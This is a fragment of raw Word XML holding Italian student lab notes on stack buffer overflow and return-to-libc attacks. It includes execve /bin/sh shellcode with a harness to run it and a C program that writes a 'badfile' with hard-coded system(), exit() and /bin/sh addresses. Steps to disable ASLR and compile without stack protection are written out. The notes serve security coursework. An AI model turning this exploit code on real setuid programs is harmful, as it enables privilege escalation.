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R</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">eturn to lib </w:t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es1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 char code[] =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"\x31\xc0\x50\x68//sh\x68/bin"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"\x89\xe3\x50\x53\x89\xe1\x99"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"\xb0\x0b\xcd\x89";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main(int argc, char *argv){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char buffer[sizeof(code)];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strcpy(buffer, code);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printf("ciao");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((void(*)())buffer)();   //cast a un puntatore      &lt;--- chiama il code , che dovrebbe apre un bash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return 1 ;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questo genera un segmentation fault, perchè è un puntatore a una memoria che non può accedere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executable stack  -&gt; funzia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 non executable stack → non funziona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char *shell=(char *)getenv("MYSHELL");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if(shell){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printf("Value: %s\n", shell);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printf("Address: %x\n", (unsigned int)shell);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MYSHELL="\bin\bash "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ES8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//questo file va a rimpiere il badfile nel modo appropriato con i giusti indirizzi per fare attacco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main(int argc, char **argv){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char buf[200];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FILE *badfile;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memset(buf, 0xaa, 200);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*(long *) &amp;buf[70] =0xbffffde2;     // indirizzo di /bin/sh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*(long *) &amp;buf[66]=0xb7d989d0;</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">// indirizzo di exit()  da prendere con </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">
      <w:pPr>
        <w:ind w:left="4320" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">il commando gbc es2.c e poi fare: p ext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*(long *) &amp;buf[62]=0xb7da4da0;</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">// indirizzo di system.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badfile=fopen("./badfile","w");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fwrite(buf,sizeof(buf),1,badfile);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fclose(badfile);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disattivare indirizzo randomization : </w:t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sudo sysctl -w kernel.randomize_va_space=0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osservazione : </w:t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kernel.randomize_va_space=1 → varia stack</w:t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kernel.randomize_va_space=2 → varia stack e </w:t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compilare con stack non esectable:</w:t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gcc -fno-stack-protector -z noexecstack es2.c -o es2</w:t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 lancio sudo sysctl -w kernel.randomize_va_space=0 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gcc stack.c -o stack -z execstack -fno-stack-protector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badfile crea un badfile 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setti setuid stack.c prendi indirizzo memoria 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\bin\sh con es6 prendi indirizzo system e exit con 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gdb stack (-q es6 quiet mode se non sono in root) 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run -&gt; p system -&gt; p exit aggiorni es8 con indirizzi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lanci es8 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lanci stack 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funziona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08454" cy="9162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454" cy="916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484f59"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="484f59"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10) Try changing the name of the program from stack to pippo, then change it from pippo to paperino</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="484f5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484f59"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="484f59"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">stack ---&gt; pippo, il programma funziona ancora  perchè hanno la stessa lunghezza quindi la memoria in cui va ad occupare puo rimanese la stessa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="484f5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484f5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84f59"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">stack -- paperino → il programma non funzionerà una sega perchè occorre una memoria più larga e quindi gli indirizzi settati per stack non funzionano per paperino  </w:t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 print %x e % p</w:t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505450" cy="2314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